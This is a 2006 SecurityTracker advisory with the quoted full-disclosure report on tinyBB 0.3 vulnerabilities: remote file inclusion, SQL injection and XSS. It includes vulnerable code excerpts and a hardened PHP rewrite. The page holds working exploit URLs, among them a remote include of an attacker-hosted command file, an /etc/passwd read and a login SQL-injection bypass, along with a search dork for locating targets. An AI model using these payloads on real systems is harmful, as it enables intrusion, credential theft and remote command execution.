SecurityTracker.com
Category:   Application (Forum/Board/Portal)  >   tinyBB
Vendors:   epicdesigns.co.uk
tinyBB Bugs Permit Cross-Site Scripting and SQL Injection Attacks and Let Remote Users Execute Arbitrary Code
SecurityTracker Alert ID:  1016172
SecurityTracker URL:  http://securitytracker.com/id/1016172
CVE Reference:   CVE-2006-2739, CVE-2006-2740, CVE-2006-2741
Updated:  Aug 25 2009
Original Entry Date:  May 29 2006
Impact:   Disclosure of authentication information, Disclosure of system information, Disclosure of user information, Execution of arbitrary code via network, Modification of user information, User access via network
Exploit Included:  Yes  
Version(s): 0.3 and prior versions
Description:   A vulnerability was reported in tinyBB. A remote user can include and execute arbitrary code on the target system. A remote user can conduct cross-site scripting attacks. A remote user can inject SQL commands.

The 'footers.php' script does not properly validate user-supplied input. If register_globals is enabled, a remote user can supply a specially crafted URL to cause the target system to include and execute arbitrary PHP code from a remote location. The PHP code, including operating system commands, will run with the privileges of the target web service.

A demonstration exploit URL is provided:

http://[target]/[tBBPath]/footers.php?tinybb_footers=http://[attacker]/cmd.txt?

The 'forgot.php' and 'login.php' scripts do not properly validate user-supplied input. A remote user can supply a specially crafted parameter value to execute SQL commands on the underlying database. Other scripts and parameters are also affected.

A demonstration exploit URL is provided:

http://[target]/[tBBPath]/login.php?username=heh/**/or/**/isnull(1/0)/*&password=nothing

Several scripts do not properly filter HTML code from user-supplied input before displaying the input. A remote user can create a specially crafted URL that, when loaded by a target user, will cause arbitrary scripting code to be executed by the target user's browser. The code will originate from the site running the tinyBB software and will run in the security context of that site. As a result, the code will be able to access the target user's cookies (including authentication cookies), if any, associated with the site, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

The vendor was notified on May 27, 2006.

A demonstration exploit is available at:

http://www.nukedx.com/?getxpl=33

The original advisory is available at:

http://www.nukedx.com/?viewdoc=33

Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI reported this vulnerability.

Impact:   A remote user can execute arbitrary PHP code and operating system commands on the target system with the privileges of the target web service.

A remote user can access the target user's cookies (including authentication cookies), if any, associated with the site running the tinyBB software, access data recently submitted by the target user via web form to the site, or take actions on the site acting as the target user.

A remote user can execute SQL commands on the underlying database.

Solution:   No solution was available at the time of this entry.
Vendor URL:  www.epicdesigns.co.uk/projects/tinybb.php
Cause:   Input validation error, State error
Underlying OS:  Linux (Any), UNIX (Any), Windows (Any)

Message History:   None.


 Source Message Contents

Subject:  [Full-disclosure] Advisory: tinyBB <= 0.3 Multiple Remote

--Security Report--
Advisory: tinyBB <= 0.3 Multiple Remote Vulnerabilities.
---
Author: Mustafa Can Bjorn "nukedx a.k.a nuker" IPEKCI
---
Date: 27/05/06 05:37 AM
---
Contacts:{
ICQ: 10072
MSN/Email: nukedx@nukedx.com
Web: http://www.nukedx.com
}
---
Vendor: Epicdesigns (http://www.epicdesigns.co.uk/)
Version: 0.3 and prior versions must be affected.
About: Via these methods a remote attacker can include arbitrary files into tinyBB. The tinybb_footers variable in footers.php is not sanitized before being used. You can find the vulnerable code in footers.php at line 3
-Source in footers.php-
3: if (strlen($tinybb_footers) > 0) { require_once($tinybb_footers); }
-End of source-
Fixing this vulnerability is easy: turn off register_globals.
There is also SQL injection in forgot.php. The parameter $q is not sanitized properly before being used in an SQL query.
You can find the vulnerable code in forgot.php at lines 3-18.
-Source in forgot.php-
3: if (isset($q)) {
4: $sql="SELECT COUNT(*) FROM tinybb_members WHERE username='$q' OR email='$q'";
5: $count = mysql_result(mysql_query($sql),0);
.....
-End of source-
This can also cause XSS. You can find the vulnerable code in forgot.php at lines 19-21
-Source in forgot.php-
19:  else {
20:    echo "<p>The query <b>$q</b> could not be .....
21:  }
-End of source-
There is another SQL injection in login.php. The parameters username and password are not sanitized properly before being used in an SQL query. You can find the vulnerable code in login.php at lines 2-8
-Source in login.php-
8: $sql="SELECT count(*) FROM tinybb_members WHERE flag='1' AND username='$username' AND password='$password'";
-End of source-
I didn't write up all the vulnerabilities in tinyBB; there are too many SQL injection and XSS vulnerabilities in this tiny bulletin board.
Level: Highly Critical
---
How&Example:
Successful exploitation needs allow_url_fopen set to 1 and register_globals on
GET -> http://[victim]/[tBBPath]/footers.php?tinybb_footers=evilscript
EXAMPLE -> http://[victim]/[tBBPath]/footers.php?tinybb_footers=http://yourhost.com/cmd.txt?
If magic_quotes_gpc is off, a remote attacker can include local files too
EXAMPLE -> http://[victim]/[tBBPath]/footers.php?tinybb_footers=/etc/passwd%00
SQL injection on login.php
GET -> http://[victim]/[tBBPath]/login.php?username=heh/**/or/**/isnull(1/0)/*&password=nothing
---
Timeline:
* 27/05/2006: Vulnerability found.
* 27/05/2006: Contacted the vendor and waiting for a reply.
---
Exploit: http://www.nukedx.com/?getxpl=33
---
Original advisory can be found at: http://www.nukedx.com/?viewdoc=33
---
Dorks: "Powered by tinyBB"
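As an added example (not tinyBB's code, nor part of the advisory above), the following PHP shows hardened replacements for the three patterns the advisory quotes: the footers.php include, the login.php query, and the forgot.php lookup and echo. It assumes mysqli with mysqlnd, a password_hash() value stored in the password column, and a footers/ directory of allow-listed footer files; the table and column names are the ones the advisory shows.

```php
<?php
// Added example (not tinyBB code): hardened replacements for the three
// patterns quoted in the advisory. Table and column names follow the
// advisory; the allow-list keys and the footers/ directory are assumed.

// footers.php: never hand request data to require_once. Map the request
// parameter onto a fixed allow-list of local files instead.
function resolveFooter(array $get): ?string
{
    $allowed = [                                  // assumed footer variants
        'default' => __DIR__ . '/footers/default.php',
        'compact' => __DIR__ . '/footers/compact.php',
    ];
    $key = $get['tinybb_footers'] ?? 'default';
    // URLs, /etc/passwd%00 or array values are not keys: nothing is included,
    // whatever register_globals or allow_url_fopen are set to.
    return is_string($key) && isset($allowed[$key]) ? $allowed[$key] : null;
}

// login.php: bind the input instead of interpolating it into the query, and
// check the password with password_verify() rather than inside SQL (assumes
// the password column holds a password_hash() value).
function authenticate(mysqli $db, string $username, string $password): bool
{
    $stmt = $db->prepare(
        "SELECT password FROM tinybb_members WHERE flag='1' AND username=?"
    );
    $stmt->bind_param('s', $username);  // "heh/**/or/**/..." stays a literal
    $stmt->execute();
    $row = $stmt->get_result()->fetch_assoc();
    $stmt->close();
    return is_array($row) && password_verify($password, $row['password']);
}

// forgot.php: bind $q in the lookup and HTML-escape it before echoing it
// back, so reflected markup or script is rendered as text.
function forgotMessage(mysqli $db, string $q): string
{
    $stmt = $db->prepare(
        "SELECT COUNT(*) FROM tinybb_members WHERE username=? OR email=?"
    );
    $stmt->bind_param('ss', $q, $q);
    $stmt->execute();
    $count = (int) $stmt->get_result()->fetch_row()[0];
    $stmt->close();
    $safe = htmlspecialchars($q, ENT_QUOTES | ENT_HTML5, 'UTF-8');
    return $count > 0 ? '<p>Reset mail sent for <b>' . $safe . '</b>.</p>'
                      : '<p>The query <b>' . $safe . '</b> could not be found.</p>';
}
```

The caller of resolveFooter() should include the file only when the result is non-null; with this shape, disabling register_globals is still good hygiene but no longer the only thing standing between the request and require_once.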


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Copyright 2020, SecurityGlobal.net LLC